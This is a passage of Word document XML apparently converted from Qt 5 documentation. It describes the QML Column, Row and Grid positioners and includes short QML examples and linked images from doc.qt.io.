        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695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0B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B7D73">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Provides attached properties that contain details on where an item exists in a positioner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7D73" w:rsidRPr="002230B8" w:rsidTr="00D526D7">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0B7D73" w:rsidRPr="00C5685E" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2360" w:history="1">
              <w:r w:rsidR="000B7D73" w:rsidRPr="00C5685E">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Row</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695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0B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B7D73">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Positions its children in a row</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="008B1DCE">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1989" w:name="column"/>
      <w:bookmarkStart w:id="1990" w:name="_Toc483000961"/>
      <w:bookmarkStart w:id="1991" w:name="_Toc483003952"/>
      <w:bookmarkStart w:id="1992" w:name="_Toc483604304"/>
      <w:bookmarkStart w:id="1993" w:name="_Toc483605524"/>
      <w:bookmarkEnd w:id="1989"/>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Column</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1990"/>
      <w:bookmarkEnd w:id="1991"/>
      <w:bookmarkEnd w:id="1992"/>
      <w:bookmarkEnd w:id="1993"/>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="000B7D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/qml-column.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-column.png"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"http://doc.qt.io/qt-5/images/qml-column.png"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"http://doc.qt.io/qt-5/images/qml-column.png"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"http://doc.qt.io/qt-5/images/qml-column.png"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"http://doc.qt.io/qt-5/images/qml-column.png"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"http://doc.qt.io/qt-5/images/qml-column.png"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"http://doc.qt.io/qt-5/images/qml-column.png"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"http://doc.qt.io/qt-5/images/qml-column.png"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"http://doc.qt.io/qt-5/images/qml-column.png"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"http://doc.qt.io/qt-5/images/qml-column.png"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"http://doc.qt.io/qt-5/images/qml-column.png"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"http://doc.qt.io/qt-5/images/qml-column.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1068" type="#_x0000_t75" alt="" style="width:230.4pt;height:129.6pt">
            <v:imagedata r:id="rId2361" r:href="rId2362"/>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0B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="00490E7E" w:rsidP="000B7D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2363" w:anchor="column" w:history="1">
        <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Column</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C5685E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>items are used to vertically arrange items. The following example uses a Column item to arrange three</w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2364" w:history="1">
        <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>items in an area defined by an outer</w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2365" w:history="1">
        <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Item</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The</w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2366" w:anchor="spacing-prop" w:history="1">
        <w:r w:rsidR="000B7D73" w:rsidRPr="00C5685E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>spacing</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property is set to include a small amount of space between the rectangles.</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import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QtQuick</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typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item</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310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170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Column</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anchors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horizontalCenter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parent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horizontalCenter</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anchors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verticalCenter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parent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verticalCenter</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spacing</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"lightblue"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radius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10.0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300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Text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anchors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centerIn</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parent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font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pointSize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24</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text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"Books"</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"gold"</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radius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10.0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300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Text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anchors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centerIn</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parent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font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pointSize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24</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text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"Music"</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"lightgreen"</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radius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10.0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300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Text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anchors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centerIn</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parent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font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pointSize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24</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text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"Movies"</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Note that, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5685E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>since</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Column inherits directly from Item, any </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5685E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>background</w:t>
      </w:r>
      <w:r w:rsidRPr="00C5685E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">color must be added to a parent Rectangle, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C5685E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if desired</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="008B1DCE">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1994" w:name="row"/>
      <w:bookmarkStart w:id="1995" w:name="_Toc483000962"/>
      <w:bookmarkStart w:id="1996" w:name="_Toc483003953"/>
      <w:bookmarkStart w:id="1997" w:name="_Toc483604305"/>
      <w:bookmarkStart w:id="1998" w:name="_Toc483605525"/>
      <w:bookmarkEnd w:id="1994"/>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Row</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1995"/>
      <w:bookmarkEnd w:id="1996"/>
      <w:bookmarkEnd w:id="1997"/>
      <w:bookmarkEnd w:id="1998"/>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="000B7D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/qml-row.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-row.png"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"http://doc.qt.io/qt-5/images/qml-row.png"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"http://doc.qt.io/qt-5/images/qml-row.png"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"http://doc.qt.io/qt-5/images/qml-row.png"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"http://doc.qt.io/qt-5/images/qml-row.png"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"http://doc.qt.io/qt-5/images/qml-row.png"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"http://doc.qt.io/qt-5/images/qml-row.png"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"http://doc.qt.io/qt-5/images/qml-row.png"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"http://doc.qt.io/qt-5/images/qml-row.png"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"http://doc.qt.io/qt-5/images/qml-row.png"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"http://doc.qt.io/qt-5/images/qml-row.png"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"http://doc.qt.io/qt-5/images/qml-row.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1069" type="#_x0000_t75" alt="" style="width:122.7pt;height:43.2pt">
            <v:imagedata r:id="rId2367" r:href="rId2368"/>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0B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="00490E7E" w:rsidP="000B7D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2369" w:anchor="row" w:history="1">
        <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Row</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AB77F1">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>items are used to horizontally arrange items. The following example uses a Row item to arrange three rounded</w:t>
      </w:r>
      <w:r w:rsidR="00AB77F1">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2370" w:history="1">
        <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AB77F1">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>items in an area defined by an outer colored Rectangle. The</w:t>
      </w:r>
      <w:r w:rsidR="00AB77F1">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2371" w:anchor="spacing-prop" w:history="1">
        <w:r w:rsidR="000B7D73" w:rsidRPr="00AB77F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>spacing</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AB77F1">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property is set to include a small amount of space between the rectangles.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="000B7D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB77F1">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ensure</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that the parent Rectangle is large enough so that there is some space left around the edges of the horizontally centered Row item.</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import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QtQuick</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320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110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"#c0c0c0"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Row</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anchors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horizontalCenter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parent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horizontalCenter</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anchors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verticalCenter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parent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verticalCenter</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spacing</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100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100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radius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20.0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"#024c1c"</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100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100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radius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20.0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"#42a51c"</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100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100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radius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20.0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"white"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rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="000B7D73">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="008B1DCE">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1999" w:name="grid"/>
      <w:bookmarkStart w:id="2000" w:name="_Toc483000963"/>
      <w:bookmarkStart w:id="2001" w:name="_Toc483003954"/>
      <w:bookmarkStart w:id="2002" w:name="_Toc483604306"/>
      <w:bookmarkStart w:id="2003" w:name="_Toc483605526"/>
      <w:bookmarkEnd w:id="1999"/>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Grid</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2000"/>
      <w:bookmarkEnd w:id="2001"/>
      <w:bookmarkEnd w:id="2002"/>
      <w:bookmarkEnd w:id="2003"/>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="000B7D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/qml-grid-spacing.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-grid-spacing.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00983E72">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00983E72">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-grid-spacing.png"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"http://doc.qt.io/qt-5/images/qml-grid-spacing.png"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"http://doc.qt.io/qt-5/images/qml-grid-spacing.png"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"http://doc.qt.io/qt-5/images/qml-grid-spacing.png"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"http://doc.qt.io/qt-5/images/qml-grid-spacing.png"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"http://doc.qt.io/qt-5/images/qml-grid-spacing.png"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"http://doc.qt.io/qt-5/images/qml-grid-spacing.png"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"http://doc.qt.io/qt-5/images/qml-grid-spacing.png"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"http://doc.qt.io/qt-5/images/qml-grid-spacing.png"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"http://doc.qt.io/qt-5/images/qml-grid-spacing.png"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"http://doc.qt.io/qt-5/images/qml-grid-spacing.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1070" type="#_x0000_t75" alt="" style="width:86.4pt;height:86.4pt">
            <v:imagedata r:id="rId2372" r:href="rId2373"/>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0B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="00490E7E" w:rsidP="000B7D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
